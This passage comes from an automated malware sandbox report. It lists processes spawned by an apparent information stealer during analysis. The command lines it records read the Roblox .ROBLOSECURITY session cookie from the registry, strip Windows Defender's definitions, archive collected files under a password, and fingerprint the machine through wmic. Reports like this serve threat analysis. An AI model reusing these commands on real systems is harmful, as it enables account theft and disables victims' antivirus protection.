                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:61
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                      Target ID:62
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                      Target ID:63
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9ad0000
                                                                                                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:65
                                                                                                                                                                                                                                                                                                                      Start time:14:19:17
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:66
                                                                                                                                                                                                                                                                                                                      Start time:14:19:17
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:67
                                                                                                                                                                                                                                                                                                                      Start time:14:19:18
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9ad0000
                                                                                                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:68
                                                                                                                                                                                                                                                                                                                      Start time:14:19:19
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:69
                                                                                                                                                                                                                                                                                                                      Start time:14:19:19
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:70
                                                                                                                                                                                                                                                                                                                      Start time:14:19:19
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9ad0000
                                                                                                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:71
                                                                                                                                                                                                                                                                                                                      Start time:14:19:19
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7b0930000
                                                                                                                                                                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:72
                                                                                                                                                                                                                                                                                                                      Start time:14:19:22
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:73
                                                                                                                                                                                                                                                                                                                      Start time:14:19:22
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:74
                                                                                                                                                                                                                                                                                                                      Start time:14:19:23
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:77
                                                                                                                                                                                                                                                                                                                      Start time:14:19:25
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:78
                                                                                                                                                                                                                                                                                                                      Start time:14:19:25
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:79
                                                                                                                                                                                                                                                                                                                      Start time:14:19:25
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:80
                                                                                                                                                                                                                                                                                                                      Start time:14:19:36
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff647c90000
                                                                                                                                                                                                                                                                                                                      File size:468'120 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:81
                                                                                                                                                                                                                                                                                                                      Start time:14:19:45
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:82
                                                                                                                                                                                                                                                                                                                      Start time:14:19:45
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:83
                                                                                                                                                                                                                                                                                                                      Start time:14:19:45
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6d7ed0000
                                                                                                                                                                                                                                                                                                                      File size:630'736 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:84
                                                                                                                                                                                                                                                                                                                      Start time:14:19:48
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:85
                                                                                                                                                                                                                                                                                                                      Start time:14:19:48
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:86
                                                                                                                                                                                                                                                                                                                      Start time:14:19:48
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:wmic os get Caption
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6e2040000
                                                                                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:87
                                                                                                                                                                                                                                                                                                                      Start time:14:19:49
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:88
                                                                                                                                                                                                                                                                                                                      Start time:14:19:49
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:89
                                                                                                                                                                                                                                                                                                                      Start time:14:19:49
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6e2040000
                                                                                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:90
                                                                                                                                                                                                                                                                                                                      Start time:14:19:50
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:91
                                                                                                                                                                                                                                                                                                                      Start time:14:19:50
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:92
                                                                                                                                                                                                                                                                                                                      Start time:14:19:50
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6e2040000
                                                                                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:93
                                                                                                                                                                                                                                                                                                                      Start time:14:19:51
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:94
                                                                                                                                                                                                                                                                                                                      Start time:14:19:51
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
